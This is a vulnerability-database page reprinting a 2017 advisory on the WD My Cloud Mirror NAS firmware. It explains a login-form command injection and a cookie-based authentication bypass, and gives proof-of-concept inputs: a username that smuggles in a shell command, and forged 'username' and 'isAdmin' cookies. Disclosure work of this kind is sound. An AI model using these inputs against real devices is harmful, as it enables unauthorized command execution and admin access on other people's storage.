Lucene search
K

WD My Cloud Mirror 2.11.153 Remote Command Execution / Authentication Bypass

🗓️ 25 Jan 2017 00:00:00Reported by Kacper SzurekType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 34 Views

WD My Cloud Mirror 2.11.153 RCE and Authentication Bypass exploi

Code
`# Exploit Title: WD My Cloud Mirror 2.11.153 RCE and Authentication Bypass  
# Date: 24.01.2017  
# Software Link: https://www.wdc.com  
# Exploit Author: Kacper Szurek  
# Contact: https://twitter.com/KacperSzurek  
# Website: https://security.szurek.pl/  
# Category: local  
  
1. Description  
  
Itas possible to execute arbitrary commands using login form because `exec()` function is used without `escapeshellarg()`.  
  
It's possible to bypass login form because function only check if `$_COOKIE['username']` and `$_COOKIE['isAdmin']` exist.  
  
https://security.szurek.pl/wd-my-cloud-mirror-211153-rce-and-authentication-bypass.html  
  
2. Proof of Concept  
  
For RCE simply use as username:  
  
a" || your_command_to_execute || "  
  
For authentication bypass set COOKIES:  
  
username=1; isAdmin=1  
  
and then visit for example php/users.php  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Jan 2017 00:00Current
0.6Low risk
Vulners AI Score0.6
34